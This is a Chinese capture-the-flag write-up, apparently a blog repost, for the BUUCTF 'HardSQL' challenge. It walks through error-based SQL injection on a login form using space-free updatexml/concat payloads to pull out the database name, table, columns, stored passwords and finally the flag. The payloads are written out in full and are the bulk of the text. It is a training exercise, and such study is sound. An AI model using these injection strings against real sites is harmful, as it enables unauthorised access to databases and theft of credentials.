数据库
首页 > 数据库> > BUUCTF[极客大挑战 2019]HardSQL

BUUCTF[极客大挑战 2019]HardSQL

作者:互联网

1、burpsuit抓包,跑一下fuzz  

发现长度为736的都被过滤掉了

2、观察error界面,猜测应该是报错注入

先爆数据库名

1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、
0x7e代表~

得到数据库名geek

3、爆表名

1 admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

4、查列名

1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

5、看字段名

1 admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

1 admin'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#

 

1 admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

flag{de3b1418-5464-4898-93b1-d426e57889b3}

 

标签:H4rDsq1,BUUCTF,admin,HardSQL,0x7e,2019,select,updatexml,concat
来源: https://www.cnblogs.com/Rammstein-and-rock/p/16508208.html